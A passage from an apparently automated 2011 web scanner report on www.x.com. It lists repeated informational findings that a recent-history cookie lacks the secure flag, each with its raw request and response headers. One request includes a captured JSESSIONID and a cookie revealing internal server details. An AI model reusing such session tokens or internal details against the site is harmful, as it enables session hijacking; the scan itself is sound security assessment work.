The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/xcommerce-blogs/blog/2011/06/08/how-may-we-serve-you-better HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:27 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323037333b31342c323232363b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b31342c323030353b33382c363030363b33382c363233383b33382c363039373b33382c363133383b33382c363238353b33382c363330313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:27 GMT; Path=/
Vary: User-Agent
JP: D=132206 t=1313157087884897
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.87. https://www.x.com/community/xcommerce-blogs/blog/2011/06/26/are-you-headed-to-fowa  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/xcommerce-blogs/blog/2011/06/26/are-you-headed-to-fowa

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/xcommerce-blogs/blog/2011/06/26/are-you-headed-to-fowa HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:26 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323232363b31342c323030323b31342c323037333b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b31342c323030353b33382c363039373b33382c363133383b33382c363233383b33382c363330313b33382c363238353b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:27 GMT; Path=/
Vary: User-Agent
JP: D=143677 t=1313157087084685
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.88. https://www.x.com/community/xcommerce-blogs/blog/2011/07/04/paypal-x-developer-challenge-for-android-vote-now-for-peoples-choice-award  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/xcommerce-blogs/blog/2011/07/04/paypal-x-developer-challenge-for-android-vote-now-for-peoples-choice-award

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/xcommerce-blogs/blog/2011/07/04/paypal-x-developer-challenge-for-android-vote-now-for-peoples-choice-award HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:25 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030323b31342c323037333b31342c323232363b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b31342c323030353b33382c363133383b33382c363233383b33382c363330313b33382c363238353b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:26 GMT; Path=/
Vary: User-Agent
JP: D=99334 t=1313157086694004
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.89. https://www.x.com/community/xcommerce-blogs/blog/2011/07/18/our-infrastructure-plans  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/xcommerce-blogs/blog/2011/07/18/our-infrastructure-plans

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/xcommerce-blogs/blog/2011/07/18/our-infrastructure-plans HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:25 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030323b31342c323232363b31342c323037333b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b31342c323030353b33382c363233383b33382c363330313b33382c363238353b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:26 GMT; Path=/
Vary: User-Agent
JP: D=79734 t=1313157086409698
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.90. https://www.x.com/community/xcommerce-blogs/blog/2011/07/28/xcommerce-innovate-developer-conference-2011--registration-open  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/xcommerce-blogs/blog/2011/07/28/xcommerce-innovate-developer-conference-2011--registration-open

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/xcommerce-blogs/blog/2011/07/28/xcommerce-innovate-developer-conference-2011--registration-open HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:25 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030323b31342c323037333b31342c323232363b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b31342c323030353b33382c363238353b33382c363330313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:26 GMT; Path=/
Vary: User-Agent
JP: D=108461 t=1313157085908464
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.91. https://www.x.com/community/xcommerce-blogs/blog/2011/08/02/winners-of-paypals-third-developer-challenge-revealed  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/xcommerce-blogs/blog/2011/08/02/winners-of-paypals-third-developer-challenge-revealed

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/xcommerce-blogs/blog/2011/08/02/winners-of-paypals-third-developer-challenge-revealed HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:24 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030323b31342c323232363b31342c323037333b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b31342c323030353b33382c363330313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:25 GMT; Path=/
Vary: User-Agent
JP: D=96364 t=1313157085618096
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.92. https://www.x.com/docs/DOC-1031  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1031

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1031 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:48 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313033313b3130322c313337323b3130322c313035313b3130322c313631333b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:48 GMT; Path=/
Vary: User-Agent
JP: D=96847 t=1313157228488141
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.93. https://www.x.com/docs/DOC-1041  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1041

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1041 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:07 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313034313b3130322c313130383b3130322c333833363b3130322c313333323b3130322c313535313b3130322c333230313b3130322c323234313b3130322c333237313b3130322c333332313b3130322c333332323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:07 GMT; Path=/
Vary: User-Agent
JP: D=129414 t=1313157247469487
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.94. https://www.x.com/docs/DOC-1051  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1051

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1051 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:47 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313035313b3130322c313631333b3130322c313337323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:48 GMT; Path=/
Vary: User-Agent
JP: D=159037 t=1313157228026431
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.95. https://www.x.com/docs/DOC-1106  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1106

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1106 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/community/ppx/button_manager
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323030373b31342c323030333b31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b3130322c333831313b332c323032353b332c32333938353b332c31303939373b332c323839313b332c33353136303b332c323430323b332c35333639373b332c39313330313b332c31323739393b332c3133313833303b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:40:09 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030373b31342c323030333b31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b3130322c313130363b3130322c333831313b332c38383139383b332c3133383934323b332c38373839383b332c3134303532383b332c323032353b332c32333938353b332c31303939373b332c323839313b332c33353136303b332c323430323b; Expires=Sun, 11-Sep-2011 13:40:10 GMT; Path=/
Vary: User-Agent
JP: D=139511 t=1313156410450395
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.96. https://www.x.com/docs/DOC-1108  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1108

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1108 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:05 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313130383b3130322c333833363b3130322c313535313b3130322c333230313b3130322c323234313b3130322c333237313b3130322c333332313b3130322c333332323b3130322c333335313b3130322c333335323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:06 GMT; Path=/
Vary: User-Agent
JP: D=99860 t=1313157246030665
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.97. https://www.x.com/docs/DOC-1116  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1116

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1116 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:12 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313130363b3130322c313433313b3130322c313337343b3130322c313333323b3130322c313034313b3130322c313130383b3130322c333833363b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:12 GMT; Path=/
Vary: User-Agent
JP: D=130471 t=1313157252790233
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.98. https://www.x.com/docs/DOC-1176  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1176

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1176 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:15 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313130363b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:15 GMT; Path=/
Vary: User-Agent
JP: D=129417 t=1313157255561975
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.99. https://www.x.com/docs/DOC-1204  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1204

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1204 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:13 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313130363b3130322c313433313b3130322c313337343b3130322c313333323b3130322c313034313b3130322c313130383b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:13 GMT; Path=/
Vary: User-Agent
JP: D=312167 t=1313157253541541
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.100. https://www.x.com/docs/DOC-1216  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1216

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1216 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:11 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313231363b3130322c323334363b3130322c313130363b3130322c313433313b3130322c313337343b3130322c313333323b3130322c313034313b3130322c313130383b3130322c333833363b3130322c313535313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:12 GMT; Path=/
Vary: User-Agent
JP: D=91982 t=1313157252137257
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.101. https://www.x.com/docs/DOC-1332  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1332

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1332 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:06 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313333323b3130322c313130383b3130322c333833363b3130322c313535313b3130322c333230313b3130322c323234313b3130322c333237313b3130322c333332313b3130322c333332323b3130322c333335313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:06 GMT; Path=/
Vary: User-Agent
JP: D=140843 t=1313157246673403
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.102. https://www.x.com/docs/DOC-1372  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1372

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1372 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:47 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313337323b3130322c313631333b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:47 GMT; Path=/
Vary: User-Agent
JP: D=87320 t=1313157227528974
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.103. https://www.x.com/docs/DOC-1374  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1374

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1374 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:08 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313337343b3130322c313333323b3130322c313130383b3130322c313034313b3130322c333833363b3130322c313535313b3130322c333230313b3130322c323234313b3130322c333237313b3130322c333332313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:08 GMT; Path=/
Vary: User-Agent
JP: D=92665 t=1313157248423211
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.104. https://www.x.com/docs/DOC-1401  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1401

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1401 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:13 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313430313b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313230343b3130322c313130363b3130322c313433313b3130322c313337343b3130322c313333323b3130322c313034313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:14 GMT; Path=/
Vary: User-Agent
JP: D=292571 t=1313157254169391
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.105. https://www.x.com/docs/DOC-1431  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1431

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1431 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:08 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
